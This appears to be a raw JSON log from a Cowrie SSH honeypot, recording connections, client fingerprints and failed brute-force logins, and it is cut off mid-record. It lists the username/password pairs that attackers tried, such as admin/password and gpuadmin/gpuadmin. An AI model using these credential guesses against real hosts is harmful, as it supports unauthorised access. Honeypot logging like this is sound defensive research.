{"eventid":"cowrie.session.connect","src_ip":"171.243.150.245","src_port":39622,"dst_ip":"1.2.3.4","dst_port":22,"session":"bead1395fe08","protocol":"ssh","message":"New connection: 171.243.150.245:39622 (1.2.3.4:22) [session: bead1395fe08]","sensor":"my-vps","timestamp":"2025-08-28T00:45:55.882265Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:45:55.915175Z","src_ip":"171.243.150.245","session":"bead1395fe08"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T00:45:55.923711Z","src_ip":"194.233.79.134","session":"5cea2005b8ea"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:45:56.084164Z","src_ip":"171.243.150.245","session":"bead1395fe08"}
{"eventid":"cowrie.login.failed","username":"admin","password":"0l0ctyQh243O63uD","message":"login attempt [admin/0l0ctyQh243O63uD] failed","sensor":"my-vps","timestamp":"2025-08-28T00:45:57.564539Z","src_ip":"171.243.150.245","session":"bead1395fe08"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:45:58.796612Z","src_ip":"171.243.150.245","session":"bead1395fe08"}
{"eventid":"cowrie.login.failed","username":"gpuadmin","password":"gpuadmin","message":"login attempt [gpuadmin/gpuadmin] failed","sensor":"my-vps","timestamp":"2025-08-28T00:45:59.749007Z","src_ip":"194.233.79.134","session":"5cea2005b8ea"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:46:01.327029Z","src_ip":"194.233.79.134","session":"5cea2005b8ea"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57470,"dst_ip":"1.2.3.4","dst_port":22,"session":"cfaa64d1f8d3","protocol":"ssh","message":"New connection: 217.72.205.35:57470 (1.2.3.4:22) [session: cfaa64d1f8d3]","sensor":"my-vps","timestamp":"2025-08-28T00:46:16.860636Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:46:16.862131Z","src_ip":"217.72.205.35","session":"cfaa64d1f8d3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:46:36.739302Z","src_ip":"176.65.149.186","session":"6eca255c9e96"}
{"eventid":"cowrie.session.closed","duration":180.13801169395447,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:46:36.744399Z","src_ip":"176.65.149.186","session":"6eca255c9e96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":6103,"dst_ip":"1.2.3.4","dst_port":22,"session":"89c364c9016f","protocol":"ssh","message":"New connection: 212.227.125.160:6103 (1.2.3.4:22) [session: 89c364c9016f]","sensor":"my-vps","timestamp":"2025-08-28T00:46:40.463986Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-28T00:46:40.686297Z","src_ip":"212.227.125.160","session":"89c364c9016f"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T00:46:41.070108Z","src_ip":"212.227.125.160","session":"89c364c9016f"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T00:46:43.958206Z","src_ip":"212.227.125.160","session":"89c364c9016f"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:46:43.959747Z","src_ip":"212.227.125.160","session":"89c364c9016f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55246,"dst_ip":"1.2.3.4","dst_port":22,"session":"442ad87a736a","protocol":"ssh","message":"New connection: 212.227.125.160:55246 (1.2.3.4:22) [session: 442ad87a736a]","sensor":"my-vps","timestamp":"2025-08-28T00:46:56.253082Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:46:56.663775Z","src_ip":"212.227.125.160","session":"442ad87a736a"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:46:56.775405Z","src_ip":"212.227.125.160","session":"442ad87a736a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"0l0ctyQh243O63uD","message":"login attempt [admin/0l0ctyQh243O63uD] failed","sensor":"my-vps","timestamp":"2025-08-28T00:46:59.103463Z","src_ip":"212.227.125.160","session":"442ad87a736a"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:47:00.951493Z","src_ip":"212.227.125.160","session":"442ad87a736a"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.245","src_port":47492,"dst_ip":"1.2.3.4","dst_port":22,"session":"62ca7ddd1b0c","protocol":"ssh","message":"New connection: 171.243.150.245:47492 (1.2.3.4:22) [session: 62ca7ddd1b0c]","sensor":"my-vps","timestamp":"2025-08-28T00:47:02.514399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:47:02.565777Z","src_ip":"171.243.150.245","session":"62ca7ddd1b0c"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:47:02.769791Z","src_ip":"171.243.150.245","session":"62ca7ddd1b0c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38082,"dst_ip":"1.2.3.4","dst_port":22,"session":"f94d3edfbbad","protocol":"ssh","message":"New connection: 212.227.125.160:38082 (1.2.3.4:22) [session: f94d3edfbbad]","sensor":"my-vps","timestamp":"2025-08-28T00:47:03.185066Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:47:03.211804Z","src_ip":"212.227.125.160","session":"f94d3edfbbad"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T00:47:03.630030Z","src_ip":"212.227.125.160","session":"f94d3edfbbad"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-28T00:47:04.198397Z","src_ip":"171.243.150.245","session":"62ca7ddd1b0c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-28T00:47:04.847973Z","src_ip":"212.227.125.160","session":"f94d3edfbbad"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:47:05.417151Z","src_ip":"171.243.150.245","session":"62ca7ddd1b0c"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T00:47:06.097640Z","src_ip":"212.227.125.160","session":"f94d3edfbbad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42966,"dst_ip":"1.2.3.4","dst_port":22,"session":"22c2021d02b0","protocol":"ssh","message":"New connection: 212.227.125.160:42966 (1.2.3.4:22) [session: 22c2021d02b0]","sensor":"my-vps","timestamp":"2025-08-28T00:47:20.415223Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T00:47:20.416265Z","src_ip":"212.227.125.160","session":"22c2021d02b0"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":41050,"dst_ip":"1.2.3.4","dst_port":22,"session":"22105c617b92","protocol":"ssh","message":"New connection: 194.233.79.134:41050 (1.2.3.4:22) [session: 22105c617b92]","sensor":"my-vps","timestamp":"2025-08-28T00:47:28.759499Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T00:47:28.896050Z","src_ip":"194.233.79.134","session":"22105c617b92"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert